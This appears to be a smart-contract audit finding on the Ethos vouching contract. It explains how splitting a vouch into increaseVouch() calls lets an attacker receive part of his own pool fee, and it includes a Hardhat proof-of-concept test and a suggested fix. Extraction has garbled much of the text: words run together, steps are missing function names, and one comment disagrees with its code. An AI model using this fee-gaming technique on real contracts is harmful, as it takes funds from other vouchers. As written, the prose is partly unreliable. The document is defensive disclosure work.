Overt Alabaster Cottonmouth
The function increaseVouch() calls applyFees() internally which in turn calls _rewardPreviousVouchers(). Here, all existing vouches are proportionally awarded a part of the vouchersPoolFee
based on the ratio of their vouched amount to the total vouched amount. This includes the vouchId whose stake amount is being increased.
This can be used to game the system in the following manner:
Assumption: Entry vouchers pool fee basis points =
(for easy calculation). This effectively means50%
of the voucher'smsg.value
will be deducted as fee. -
Normal Scenario:
- Alice vouches
100 ETH
for a subject by callingvouchByProfileId()
. - Bob vouches
1000 ETH
for the subject by callingvouchByProfileId()
.- Alice gets
50% of 1000 = 500 ETH
as fee. Alice's balance =600 ETH
. - Bob's balance =
500 ETH
- Alice gets
- Alice vouches
Attack Scenario:
- Alice vouches
100 ETH
for a subject by callingvouchByProfileId()
. - Bob (attacker) vouches
1000 ETH
in two steps.- Step1: He calls
with200 ETH
.- Alice gets
50% of 200 = 100 ETH
as fee. Alice's balance =200 ETH
. - Bob's balance =
100 ETH
- Alice gets
- Step2: He calls
with800 ETH
.- Alice gets
(50% of 800) * 2/3 = 266.67 ETH
as fee. Alice's balance =466.67
. - Bob gets
(50% of 800) * 1/3 = 133.34 ETH
as fee. Bob's balance =633.34 ETH
- Alice gets
- Step1: He calls
- Alice vouches
Bob saved 133.34 ETH
in fee and robbed others of this amount. Note that the above example uses 2 steps for simplicity but Bob can increase the number of steps to enahnce his profit further.
Apply the following patch inside test/EthosVouch.test.ts
and see it pass when run via npm run hardhat -- test --grep "should demonstrate fee savings with two-step vouching strategy"
diff --git a/ethos/packages/contracts/test/EthosVouch.test.ts b/ethos/packages/contracts/test/EthosVouch.test.ts
index be4d7f1..995ac57 100644
--- a/ethos/packages/contracts/test/EthosVouch.test.ts
+++ b/ethos/packages/contracts/test/EthosVouch.test.ts
@@ -131,13 +131,13 @@ describe('EthosVouch', () => {
0, // Entry protocol fee basis points
0, // Entry donation fee basis points
- 0, // Entry vouchers pool fee basis points
+ 10000, // Entry vouchers pool fee basis points
0, // Exit fee basis points
await ethosVouchProxy.waitForDeployment();
const ethosVouchAddress = await ethosVouchProxy.getAddress();
@@ -441,12 +441,58 @@ describe('EthosVouch', () => {
'Wrong unhealthyResponsePeriod, 2',
describe('vouchByProfileId', () => {
+ it('should demonstrate fee savings with two-step vouching strategy', async () => {
+ const {
+ ethosVouch,
+ ethosProfile,
+ } = await loadFixture(deployFixture);
+ // create a profile
+ await ethosProfile.connect(OWNER).inviteAddress(VOUCHER_0.address);
+ await ethosProfile.connect(OWNER).inviteAddress(PROFILE_CREATOR_0.address);
+ await ethosProfile.connect(OWNER).inviteAddress(PROFILE_CREATOR_1.address);
+ await ethosProfile.connect(OWNER).inviteAddress(VOUCHER_1.address);
+ await ethosProfile.connect(VOUCHER_0).createProfile(1);
+ await ethosProfile.connect(PROFILE_CREATOR_0).createProfile(1);
+ await ethosProfile.connect(PROFILE_CREATOR_1).createProfile(1);
+ await ethosProfile.connect(VOUCHER_1).createProfile(1);
+ // Step 1: Naive user vouches 100 ETH
+ await ethosVouch.connect(VOUCHER_0).vouchByProfileId(4, DEFAULT_COMMENT, DEFAULT_METADATA, {
+ value: ethers.parseEther('100'),
+ });
+ const attacker = VOUCHER_1;
+ // Step 2: Attacker vouches 200 ETH
+ await ethosVouch.connect(attacker).vouchByProfileId(4, DEFAULT_COMMENT, DEFAULT_METADATA, {
+ value: ethers.parseEther('200'),
+ });
+ // Step 3: Attacker vouches 200 ETH
+ await ethosVouch.connect(attacker).increaseVouch(
+ 1, // Same vouch ID
+ { value: ethers.parseEther('800') }
+ );
+ const initialVouch = await ethosVouch.vouches(0);
+ const attackerVouch = await ethosVouch.vouches(1);
+ // Get final state for two-step attack
+ expect(initialVouch.balance).to.be.lt(ethers.parseEther('600'));
+ expect(attackerVouch.balance).to.be.gt(ethers.parseEther('500'));
+ console.log("Fee saved = %d", attackerVouch.balance - ethers.parseEther('500'));
+ });
it('should fail if no profile', async () => {
const { ethosVouch, VOUCHER_0, ethosProfile, OWNER } = await loadFixture(deployFixture);
await ethosProfile.connect(OWNER).inviteAddress(VOUCHER_0.address);
await ethosProfile.connect(VOUCHER_0).createProfile(1);
Change the function signature of _rewardPreviousVouchers()
function _rewardPreviousVouchers(
+ bool excludeAnyVoucherId,
+ uint256 idToExclude,
uint256 amount,
uint256 subjectProfileId
) internal returns (uint256 amountDistributed)
and that of applyFees()
function applyFees(
+ bool excludeAnyVoucherId,
+ uint256 idToExclude,
uint256 amount,
bool isEntry,
uint256 subjectProfileId
) internal returns (uint256 toDeposit, uint256 totalFees)
needs to call the updatedapplyFees()
while passing paramsexcludeAnyVoucherId = true
andidToExclude = vouchId
then calls this updated_rewardPreviousVouchers()
inside it.- And lastly, exclude this
inside the twofor
loops of_rewardPreviousVouchers()
wheneverexcludeAnyVoucherId = true
. - The calls to
originating from within other functions would need to be modified withexcludeAnyVoucherId = false
andidToExclude = 0
(any value really).